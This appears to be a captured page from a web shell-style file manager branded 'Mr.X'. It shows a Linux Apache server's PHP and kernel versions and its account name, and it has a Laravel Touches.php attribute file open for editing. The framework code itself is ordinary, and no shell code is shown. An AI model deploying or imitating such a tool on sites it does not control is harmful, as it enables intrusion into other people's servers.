🤩 File Manager - Mr.X
PHP:
8.3.33
Server:
Apache
OS:
Linux 5.14.0-611.49.1.el9_7.x86_64
User:
websparkit
Navigate
Upload:
Upload
New File
New Folder
Editing:Touches.php
<?php namespace Illuminate\Database\Eloquent\Attributes; use Attribute; #[Attribute(Attribute::TARGET_CLASS)] class Touches { /** * @var array<int, string> */ public array $relations; /** * Create a new attribute instance. * * @param array<int, string>|string ...$relations */ public function __construct(array|string ...$relations) { $this->relations = is_array($relations[0]) ? $relations[0] : $relations; } }
Save Changes
Cancel
Create New File
Create New Folder